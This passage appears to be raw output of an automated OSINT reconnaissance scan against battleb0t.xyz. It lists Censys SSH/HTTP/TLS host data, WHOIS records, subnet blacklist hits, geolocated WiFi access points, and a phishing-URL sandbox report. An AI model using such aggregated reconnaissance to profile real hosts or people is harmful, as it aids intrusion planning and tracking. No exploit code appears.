"khanh-viet.lpe.gatoreviews.com": {"record_type": "CNAME", "resolved_at": "2023-01-05T13:28:25.250548626Z"}, "nexter-xande.netlify.app": {"record_type": "A", "resolved_at": "2023-02-24T12:07:02.670008211Z"}, "appraum.com": {"record_type": "A", "resolved_at": "2023-04-24T13:52:04.395837318Z"}, "fazardilham.my.id": {"record_type": "A", "resolved_at": "2023-04-10T18:12:12.859667666Z"}, "justinewon.com": {"record_type": "A", "resolved_at": "2023-03-28T15:09:11.753413656Z"}, "dist.usecloudless.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T22:19:34.494475189Z"}, "canalresponsable.demo.cbiconsulting.es": {"record_type": "CNAME", "resolved_at": "2023-03-08T15:58:56.721660647Z"}, "2omb.finance": {"record_type": "A", "resolved_at": "2023-02-22T13:46:00.762714311Z"}, "tools.iapotheca.com": {"record_type": "CNAME", "resolved_at": "2023-04-11T13:12:22.096803414Z"}, "www.lorenzoligato.com": {"record_type": "CNAME", "resolved_at": "2023-02-15T13:57:08.995428420Z"}, "foothillsauctioneers.com": {"record_type": "A", "resolved_at": "2022-11-16T13:21:59.316737877Z"}, "www.charlie.codes": {"record_type": "CNAME", "resolved_at": "2023-03-02T12:52:28.250578843Z"}, "www.kattronix.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T22:48:38.360278241Z"}}, "names": ["julia.peklak.net", "www.pepoparadise.net", "remedialteaching-detoermalijn.nl", "www.badguyz.net", "weatherapp.alecpagliarussi.me", "dashboard.styledotme.com", "www.alanmancemitsubishi.com.au", "nexter.xande. | 34.74.170.74 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0.crimson-perch.github.io | 185.199.111.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F2:6F:6D) | 37.780462,-122.390564 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.193): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 043320 (Net ID: 00:02:2D:04:33:20) | 37.780462,-122.390564 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | xfinitywifi (Net ID: 00:0D:67:8C:21:AA) | 39.0469, -77.4903 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Sunshine (Net ID: 00:07:40:87:15:01) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:33:34 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | MiCCPICC Profile
U$JLQ
clc$1
pHYs
iTXtXML:com.adobe.xmp
<exif:PixelYDimension>1024</exif:PixelYDimension>
<exif:PixelXDimension>1024</exif:PixelXDimension>
<tiff:Orientation>1</tiff:Orientation>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
IDATx
:-$oT'/
ykl_\
$GsPUa
O3N>RB
J"RKn
:Y:Dlm2
wLHH2
4<V0q
Tbi/O
Iy5: @
z0 rSOJ
Q8m0Sc
BFSvMl
:/t@S
te's8
'r_$E:
t<c:`
SxUAn
GB:`_3
.?'X$
0<Zqjyc
fTF7g
tF`"d
uC1o\
uOV`B
W9o0/
vXv5q
EKjPW
\BypB
MeTZAtj
FdAdi
ZVM$\
RK59C
WrF.w
qadakhZ
aWl>E
B.G E
/2S/yT
?N2If
_ZkowDdu
ihLaY
<q36o
\mHTs
$Sa!TuVQ
`xSkY
!FfcGgy
Twj c
l9nPO
O_R@N
bW.F`y
9v-lh
IDATE
SeR'c
JS Ik
2.S\D
3@9@h
oe1`sf?z
9ud>I
mE:Gf7
Tdb0P
-uy:Y@BE
3zRHFofBQ
g'YtL
Lx j8m/J
'A_>dW
CJ1eI
wIQ!9t
d0d'L
VLYrd
::vC1
N/38Am
'k!mL
zymOhf
T'y0l
d3o3A1
-IUSN
?rF_3
rvf5EZ
Am``"1
fBmM>
>f q9c
cQ"n!cYQy
XBMUx
mtc-2
p4va`W
Gj6Xz
oxCs6
ZSB64 | https://oldfluid.battleb0t.xyz/logo.png |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.243): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FD:64:31) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Bulldog Free internet (Net ID: 00:01:71:0A:05:E5) | 52.3759, 4.8975 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.144): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.59): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:38 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | registrar-abuse@cloudflare.com | Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2017-05-24T17:44:01Z
Creation Date: 2009-02-17T22:07:54Z
Registry Expiry Date: 2024-02-17T22:07:54Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS3.CLOUDFLARE.COM
Name Server: NS4.CLOUDFLARE.COM
Name Server: NS5.CLOUDFLARE.COM
Name Server: NS6.CLOUDFLARE.COM
Name Server: NS7.CLOUDFLARE.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2021-09-27T15:18:45Z
Creation Date: 2009-02-17T22:07:54Z
Registrar Registration Expiration Date: 2024-02-17T22:07:54Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Name Server: ns3.cloudflare.com
Name Server: ns4.cloudflare.com
Name Server: ns5.cloudflare.com
Name Server: ns6.cloudflare.com
Name Server: ns7.cloudflare.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | nnru (Category: social)
https://login.www.nn.ru | login |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft acquisitions | cdn-185-199-111-153.github.com |
| 2023-05-12 02:46:35 | Netblock Membership | No | RIPE | 1 | 0 | 3 | 0 | None | 35.229.48.0/20 | 35.229.48.116 |
| 2023-05-12 02:54:30 | Raw Data from RIRs | No | Censys | 13 | 0 | 3 | 0 | None | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b | 64.226.81.43 |
| 2023-05-12 02:50:30 | Raw Data from RIRs | No | GLEIF | 0 | 0 | 3 | 0 | None | [{u'relationships': {u'lei-records': {u'data': {u'type': u'lei-records', u'id': u'54930014QNWWH8OAC930'}, u'links': {u'related': u'https://api.gleif.org/api/v1/lei-records/54930014QNWWH8OAC930'}}}, u'attributes': {u'highlighting': u'<b>GODADDY.COM</b>, <b>LLC</b>', u'value': u'GODADDY.COM, LLC'}, u'type': u'autocompletions'}] | GoDaddy.com, LLC |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Commons-based peer production - Commons-based peer production is a term coined by Harvard Law School professor Yochai Benkler. It describes a model of socio-economic production in which large numbers of people work cooperatively; usually over the Internet. | cdn-185-199-111-153.github.com |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:D2:56:1D) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 6 | 0 | None | abusecomplaints@markmonitor.com | Domain Name: GOOGLEUSERCONTENT.COM
Registry Domain ID: 1528918319_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-10-16T09:27:01Z
Creation Date: 2008-11-17T15:58:29Z
Registry Expiry Date: 2023-11-17T15:58:29Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.GOOGLE.COM
Name Server: NS2.GOOGLE.COM
Name Server: NS3.GOOGLE.COM
Name Server: NS4.GOOGLE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
|
| 2023-05-12 02:55:22 | Linked URL - Internal | No | Google | 0 | 0 | 1 | 0 | None | https://ayhu.xyz/ | ayhu.xyz |
| 2023-05-12 02:44:19 | IPv6 Address | No | DNS Resolver | 15 | 0 | 3 | 0 | None | 2600:1f18:2489:8201::c8 | funny.battleb0t.xyz |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | githubusercontent.com | www.battleb0t.xyz |
| 2023-05-12 02:53:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 24, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fanette.wunderlich%40bbs-sachsen.de', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6680:120:WilError_01"\n "Local\\SM0:6680:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:6680:304:WilStaging_02"\n "SM0:6680:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', 